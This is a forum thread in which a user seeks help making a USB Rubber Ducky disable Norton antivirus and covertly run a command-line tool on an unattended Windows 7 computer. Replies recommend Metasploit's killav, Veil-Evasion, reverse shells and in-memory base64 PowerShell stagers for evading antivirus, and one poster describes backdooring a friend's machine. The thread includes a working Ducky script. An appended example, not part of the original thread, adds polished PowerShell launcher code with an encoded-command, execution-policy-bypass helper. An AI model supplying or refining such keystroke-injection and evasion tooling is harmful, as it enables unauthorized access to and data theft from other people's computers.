bigmat526 Posted June 13, 2017

Hello everyone. I've flashed my Ducky to a Twin Ducky, hence I put on software (portable) with command-line options. My goal is to successfully plug it into a stand-by computer and actually make it work, make it execute. But the huge problem is the anti-virus (Norton Small Business Edition). This AV keeps removing all the files and is really a pain in the ass. I was wondering if there was a way to, once plugged in, let the Ducky (temporarily) kill the anti-virus, just so it doesn't have any scanning on, so it will not detect the file, and once everything is back up me and the Ducky will be gone. I have the advantage because, one, it's Windows 7, and the accounts that are being logged onto are administrator-privileged, so pressing Yes or No with the Ducky will not be a problem. I really need help.

1. Plug in the Ducky.
2. Payloads activate; kills anti-virus (a short while, just so files can get through).
3. Run the file (command-line). Be out.

I just need to learn how to kill the AV. For Norton Small Business Edition it's pretty complex to just disable it straight from the Control Panel. Thanks so much.

-Mathew
datajumper Posted June 13, 2017

If you use Metasploit to gain a reverse_tcp connection, once you gain a Meterpreter session you can run the killav command. But if the problem is that you can't get past the antivirus to drop your shellcode or payload, you can try Veil-Evasion: create a payload with Veil; it has an option to encode Ruby into your payload, and several other methods. Or, if you have physical access to the keyboard of the target machine and you have enough time, Norton should be running in the bottom right-hand corner; just right-click on the Norton icon, it should have a "disable shields" button. Disable it temporarily until you get whatever it is that you were trying to do. But Veil-Evasion works for me: gain a reverse TCP session, then you are backdoored in.

My recent exploit: what I did was I had my Metasploit listener set up at home, then I put my Veil-Evasion payload onto a regular USB thumb drive and went to a friend's house ("I had permission", lol), and I put it in the machine, right-clicked on the Veil-Evasion payload and chose "Run as administrator", and it walked past the antivirus no problem, and I had my phone SSH'd into my listening machine at home, so I had full control on the go.

I know this isn't probably what you were looking for; I hope it helped. If not, there are some really smart, really experienced pentesters on this forum. Just hang around, be patient; one of these guys should be able to help.
digip Posted June 13, 2017

You need a payload that runs in memory and never touches disk. More than likely a PowerShell exploit, if you can get to PowerShell. You want to go to the command line before trying to kill AV, and if possible, work around it without having to kill it to get your reverse shell first. Anything that the system can read off the thumb drive as a file, AV is going to kill, which is why you use PowerShell to decode your program directly into memory to execute; it can be stored as simple base64 text, no executables to trip AV.
bigmat526 (Author) Posted June 14, 2017

This is the code:

REM Open the Run dialog and start PowerShell
DELAY 1000
GUI R
DELAY 100
STRING powershell
DELAY 100
ENTER
DELAY 1000
REM Find the Ducky's mass-storage volume; this matches on the volume label, not on the drive letter
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'D' } | select name
DELAY 500
ENTER
REM Change into the root of that volume (the Name property, e.g. "D:\")
STRING cd $usbPath.name
DELAY 100
ENTER
REM Run the portable tool from the stick with its command-line switches
STRING ./p /stext log.txt
DELAY 100
ENTER
STRING exit
DELAY 100
ENTER

"P" is the program I am trying to execute, which supports command-line features. Sorry, I am completely new to this, and sorry for asking for so much, but how would I manage to do this?
digip Posted June 14, 2017

Check the Ducky section, maybe? There should be examples for reverse shells in base64 stagers (hopefully), or some kind of example that runs a base64 payload in memory. If not there, sure, Googling will turn up something. The main thing about the Ducky is you might want to use it to write to for mass storage, but you probably don't want payloads on the mass-storage side, as AV will pick them up, hence the base64 encoding of a binary to decode and run only in memory, which will help hide your steps. Darren covers using a stager here: https://www.hak5.org/episodes/hak5-2110-how-to-get-a-reverse-shell-in-3-seconds-with-the-usb-rubber-ducky but if I recall, his was for a reverse shell that downloads a separate PS1 script from the web, which might get caught by AV, but I can't remember if he makes it run from RAM for the whole process or if it ever downloads to disk.
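The following is an added example and is not code posted by bigmat526, digip or anyone else in this thread. It does what bigmat526's Ducky one-liner does (find the stick by its volume label and run a command-line tool from it) but goes a little further: it restricts the match to removable disks, fails loudly when zero or several volumes carry the label, runs the tool with the stick as working directory, and shows how to collapse the whole thing into one base64 `-EncodedCommand` line so the Ducky types a single STRING. The label 'DUCKY', the tool name 'p.exe' and the switches '/stext log.txt' are placeholders. It is written against the PowerShell 2.0 that ships with Windows 7, hence Get-WmiObject rather than Get-CimInstance.

```powershell
# Added example for this thread; not code from any post above.
# Assumptions (placeholders): volume label 'DUCKY', tool 'p.exe' in the root
# of the stick, switches '/stext log.txt'. PowerShell 2.0 compatible.

function Find-UsbVolume {
    param(
        [Parameter(Mandatory = $true)] [string] $Label,
        [switch] $RemovableOnly
    )
    # Win32_Volume.Label is the volume label, not the drive letter; the letter
    # changes from machine to machine, the label travels with the stick.
    # DriveType 2 is "Removable Disk" in Win32_Volume.
    $volumes = @(Get-WmiObject Win32_Volume |
        Where-Object { $_.Label -eq $Label -and $_.DriveLetter })
    if ($RemovableOnly) {
        $volumes = @($volumes | Where-Object { $_.DriveType -eq 2 })
    }
    if ($volumes.Count -eq 0) {
        throw "No mounted volume labelled '$Label'."
    }
    if ($volumes.Count -gt 1) {
        $letters = ($volumes | Select-Object -ExpandProperty DriveLetter) -join ', '
        throw "Volume label '$Label' is not unique: $letters"
    }
    return $volumes[0].Name      # root path with trailing backslash, e.g. "E:\"
}

function Invoke-UsbTool {
    param(
        [Parameter(Mandatory = $true)] [string] $Label,
        [Parameter(Mandatory = $true)] [string] $Exe,
        [string[]] $Arguments = @()
    )
    $root = Find-UsbVolume -Label $Label -RemovableOnly
    $path = Join-Path $root $Exe
    if (-not (Test-Path -LiteralPath $path)) {
        throw "Tool not found on the stick: $path"
    }
    # Working directory is the stick, so a relative output file such as the
    # log.txt in the post lands next to the tool, not in C:\Windows\System32.
    $startArgs = @{
        FilePath         = $path
        WorkingDirectory = $root
        Wait             = $true
        PassThru         = $true
        NoNewWindow      = $true
    }
    if ($Arguments.Count -gt 0) { $startArgs['ArgumentList'] = $Arguments }
    $proc = Start-Process @startArgs
    return $proc.ExitCode
}

function ConvertTo-EncodedCommand {
    # Turns a multi-statement script into the single line a Ducky can type.
    # -EncodedCommand wants base64 of UTF-16LE text, hence [Text.Encoding]::Unicode.
    param([Parameter(Mandatory = $true)] [string] $Script)
    $bytes = [Text.Encoding]::Unicode.GetBytes($Script)
    return 'powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand ' +
        [Convert]::ToBase64String($bytes)
}

# Usage on the target:
#   $exit = Invoke-UsbTool -Label 'DUCKY' -Exe 'p.exe' -Arguments '/stext', 'log.txt'
# Usage when building the Ducky payload (run once on your own machine):
#   $oneLiner = "Set-Location (Get-WmiObject Win32_Volume | ? { `$_.Label -eq 'DUCKY' }).Name; .\p.exe /stext log.txt"
#   ConvertTo-EncodedCommand -Script $oneLiner
# and paste the returned text after STRING in the Ducky script.
```

Two things worth noting. First, the original one-liner silently does the wrong thing when the label matches nothing (`cd $usbPath.name` then changes into nothing, and `./p` runs from whatever the current directory happens to be) or when two volumes share the label; the checks above turn both into an error instead. Second, `-EncodedCommand` is only a transport convenience so the Ducky can type one line without worrying about quoting: PowerShell decodes it immediately, and the tool still runs as a file from the stick, so this does nothing about the AV scanning the thread is about. digip's point about staying in memory applies to the payload itself, not to how the launcher is typed.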